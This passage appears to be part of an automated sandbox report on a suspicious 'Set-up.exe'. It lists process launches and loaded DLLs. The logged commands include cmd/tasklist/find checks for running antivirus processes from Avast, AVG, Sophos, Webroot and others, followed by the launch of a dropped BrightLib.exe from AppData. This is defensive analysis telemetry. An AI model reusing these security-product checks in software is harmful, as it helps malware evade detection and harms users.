              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
